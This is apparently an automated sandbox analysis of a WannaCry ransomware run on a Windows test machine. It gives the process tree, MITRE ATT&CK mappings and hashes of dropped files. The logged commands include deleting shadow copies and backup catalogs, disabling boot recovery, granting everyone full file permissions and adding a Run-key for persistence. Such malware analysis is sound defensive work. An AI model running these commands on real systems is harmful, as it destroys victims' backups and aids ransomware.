  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3788 /prefetch:1
  2⤵
  PID:2072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1
  2⤵
  PID:2176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
  2⤵
  PID:1616

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:236

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2828

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\GetClear.docm" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4812

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff956e73cb8,0x7ff956e73cc8,0x7ff956e73cd8
  2⤵
  PID:2408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1940 /prefetch:2
  2⤵
  PID:648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2596 /prefetch:8
  2⤵
  PID:700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
  2⤵
  PID:3644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
  2⤵
  PID:4424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1
  2⤵
  PID:1616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
  2⤵
  PID:4888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1
  2⤵
  PID:4724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:1
  2⤵
  PID:3884
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
  2⤵
  PID:4920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:1
  2⤵
  PID:720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3348 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5280 /prefetch:8
  2⤵
  PID:4984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5656 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:4736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
  2⤵
  PID:4644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
  2⤵
  PID:3416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
  2⤵
  PID:4852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
  2⤵
  PID:4696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
  2⤵
  PID:3772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
  2⤵
  PID:1172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6132 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6164 /prefetch:8
  2⤵
  PID:1368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3036 /prefetch:1
  2⤵
  PID:4864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2125069614930284881,5960955470009140759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6388 /prefetch:1
  2⤵
  PID:2500

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4444

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1480

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3416

C:\Users\Admin\Downloads\WannaCry.EXE
"C:\Users\Admin\Downloads\WannaCry.EXE"
1⤵
- Drops startup file
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:1196
- C:\Windows\SysWOW64\attrib.exe
  attrib +h .
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:2100
- C:\Windows\SysWOW64\icacls.exe
  icacls . /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  - System Location Discovery: System Language Discovery
  PID:1160
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3348
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 209001722922328.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3624
- - C:\Windows\SysWOW64\cscript.exe
    cscript.exe //nologo m.vbs
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2340
- C:\Windows\SysWOW64\attrib.exe
  attrib +h +s F:\$RECYCLE
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:1584
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected] co
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:236
- - C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe
    TaskData\Tor\taskhsvc.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3092
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /b @[email protected] vs
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2748
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected] vs
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2808
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      4⤵
      System Location Discovery: System Language Discovery
      PID:1812
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2788
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:104
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4444
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:1648
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+buy+bitcoin
    3⤵
    PID:464
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x12c,0x130,0x134,0x108,0x138,0x7ff956e73cb8,0x7ff956e73cc8,0x7ff956e73cd8
      4⤵
      PID:1816
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "duasouani680" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3704
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "duasouani680" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:864
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1472
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:232
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:1076

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\@[email protected]
1⤵
PID:1160

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2176

C:\Users\Admin\Downloads\@[email protected]
"C:\Users\Admin\Downloads\@[email protected]"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1812

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\@[email protected]

Filesize
585B

MD5
0b47888e05c32516213e548804255c3a

SHA1
be9f9a39f4eaeb7926a1f8bc07200756e015b7b6

SHA256
9fdffce0cddd972142fcf6c10db2dc096bc8c59f6d41a22306002ab10f2af78e

SHA512
e7ea9e5eb852c22697afd8483dde8562a79d05caf7d4676340f3b461d70df0d69b271a50ad5a7ca2bbaff216b36443b0f098a038af05927f8ad09188dcc5ec32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b4ae6009e2df12ce252d03722e8f4288

SHA1
44de96f65d69cbae416767040f887f68f8035928

SHA256
7778069a1493fdb62e6326ba673f03d9a8f46bc0eea949aabbbbc00dcdaddf9d

SHA512
bb810721e52c77793993470692bb2aab0466f13ed4576e4f4cfa6bc5fcfc59c13552299feb6dfd9642ea07b19a5513d90d0698d09ca1d15e0598133929c05fe1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4bf4b59c3deb1688a480f8e56aab059d

SHA1
612c83e7027b3bfb0e9d2c9efad43c5318e731bb

SHA256
867ab488aa793057395e9c10f237603cfb180689298871cdf0511132f9628c82

SHA512
2ec6c89f9653f810e9f80f532abaff2a3c0276f6d299dce1b1eadf6a59e8072ed601a4f9835db25d4d2610482a00dd5a0852d0ef828678f5c5ed33fe64dddca9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
8df0335bf01cf60d16ad8213fca04f97

SHA1
a6fe5986753188bb951df57eb7b5592c0ef42c98

SHA256
242db22167115fb3e9ea02d5029555d2bbdf560163c3f4c754b262f1054672da

SHA512
87901faf23a5cb00798bd2a3c9dd14ac14d0246307d669910e8ab3a213c6a225a3af5ffd1b40215a5439b5ff77906871219ef4c52ebae6bf27b0a021b2142413

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e10aaa599f9ef2394900c27f536ca7a5

SHA1
e2f184b1367bdaf043e4834551814d8266e1d682

SHA256
f580f3f88a78ae9235493d95f357d83f95054919aaab43d70496062a484e2c9f

SHA512
0a2b246ef1e34753a0e94c1f1cb1af078cbb22bd7ffebd0b6fe04b571f5b59c9763a5850f59a6a0366fc7dc1321e3432ebfd4d3daa97ae57c6d8e7398962b843

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\064765ab-8f0a-4d6e-9393-64d0483e4fa7.tmp

Filesize
7KB

MD5
b1411f1cf3d23088abe7ac77e54fd2a5

SHA1
b9873a96141b9a9cafb7063ad6991311de58ade0

SHA256
5925529fe7d5e6ee646f6a90d6819e75b77b1b8c97cce4b44d104550e7fc6270

SHA512
590269070751043a8a822d0329266cd84c295938d0ebea3d8739821b180a0ed85b1d071c358f7d74d0de047fd369d969fb9c7ec27cf022877b6bb1a4b84e5a14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

Filesize
44KB

MD5
443ccb1673ab00cc0e6b7e9bc1f0f3b3

SHA1
550e093c934883bc6e8e75214d743ccf899f3524

SHA256
63261b3cc6c7fcba21869eaceb4c8913769adac24f50267077e3dbb841f595dc

SHA512
ba8da55f17979c6c9aba9bfde7c061f7cf70b0cd871d4ec1f6c4f63722e9de1c5b0012b1aba43a033fa95f8f5a35a585ea2871b1ee26a9b03b170f2065c0c467

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

Filesize
264KB

MD5
a5ee44f63dda5825592b51cf9bf0819c

SHA1
b2c847e820e8793291641a94f2ed6c2d9621d903

SHA256
17ce9bbbf3a39e7bb942e38a4acab2c069b90156f88b895dbc57a65fcb30e026

SHA512
ac7e48a359f467b83a120bd622ec9e47cde59ef171ef823d590fdedc53db6259399e45c35e181d0db2dbfe0ee4fd761a7b25b077b159891dcf542d1778daef9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_2

Filesize
1.0MB

MD5
75fddd10464be574e7d2dc1d32ca7e7b

SHA1
4899afec006bd1c828adb850aab1d5cd75d5ee0a

SHA256
41a950e2b74413e8501fe7a09a69558bbdc1f343c9919bc3cd4213733e73c96f

SHA512
f10899d5015076d105f9872ed79bed9d9464c344d8d80736218b0e2664adad211e05f7597231bd196eb81503d6e380b3e3d276c87ee760260ffa84cbba56d72f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3

Filesize
4.0MB

MD5
9a9c182703e8234b347c7769b1024ba2

SHA1
422de5cfc8bd8ce6b34cc422f8b74c0fe63f51bd

SHA256
32cf6dc4102417087776d584370142e80f4b6bea2996a313c63190404c7b879b

SHA512
d6266e3ae7a1e06e3569668d8a242f8957e305e20f7f0780c7d86a71b08b80422ecdf75b7ded5cd9b57f5fcbbc4cc3c700af3f095e12e6eeaedb5929e0b36db3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000040

Filesize
209KB

MD5
3e552d017d45f8fd93b94cfc86f842f2

SHA1
dbeebe83854328e2575ff67259e3fb6704b17a47

SHA256
27d9c4613df7a3c04da0b79c13217aa69992b441acb7e44bf2a7578ca87d97d6

SHA512
e616436f2f15615429c7c5c37de3990c3e86c5e1da7d75a0f524fc458b75d44a5be1a3648a628d63e1cf8aa062e08b538f2f2bc9c6a0b42157beb24f82c571d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
792B

MD5
a7cbcbc06fbfd2440c410cfc226d4013

SHA1
00fe6cab1e9df410ef91d8bf5111c997d8906c9d

SHA256
934ba46b245687fbd9e8bec6f019c606bd9caa952ef4cd56a08343e4a60a0345

SHA512
670b1dfc545a5692069099e84ce76e416fb111aac3143340ba7f65b0c2c0d49ef58feff3f09173c71d453eadd3db706599c6c82f294f86f037d5d7177e165c2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
94702ddc15928b83166e0c3d0916d738

SHA1
9649b35615c10faf8aae4feb50ba2eab5272a304

SHA256
03033c50e17f75a09e5c7bea16d2233037ef8253f9d32596ec520348033f907b

SHA512
325a4aa68d7e9f84df9836923ecfa728ce26183f8aa7f7d3e76553fd64543e24f4820be34108b621d050f3af49a3205b473d121c92266421e35712f0021f4765

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
5KB

MD5
ae79deb95cc9f2e3b899f8b09634ffb6

SHA1
81b4b6a3914bac487b05c4a07b3d84dbaa22b4d9

SHA256
e548445103cd6cd8484f060e2121470efaa0da73ae8b00772a6578d29932be11

SHA512
7d908d3e4eb72b2bd244d8c34bf49cd9ac01532f38693ee71a7d92f829f1dd6a30477270cdb640333dc3a7e0232accdfecb0e8317880e012dcb699b181b40b8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
5KB

MD5
efa2ff2edd5730da639e0695ccd7e89c

SHA1
73e00a3fc7e735b8ac3203e7f3cebb058f75edbc

SHA256
0a3753fbc43ad4e9c9049cc0dd322e282bad07bc208677b5ceeb0c90f46b6ae4

SHA512
ec9b8df9b3fb1765f1c8edacb24d16d7c1bcbcf58c3d1ab3a93c3cfccdda0c2eb3fc9e4aeb5ce45a76f160df4b491179045ba0932afa3d9eb8e3846c3928124d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

Filesize
28KB

MD5
5874ce5b47ac9b6829b3a3c81d4f3997

SHA1
82ed065443f7234d80da2aa63f0315b9c3885a2e

SHA256
dea4fa99142f74d5ce08c6a8f274d9048adbf18b9159defa8cea1b912160bd7d

SHA512
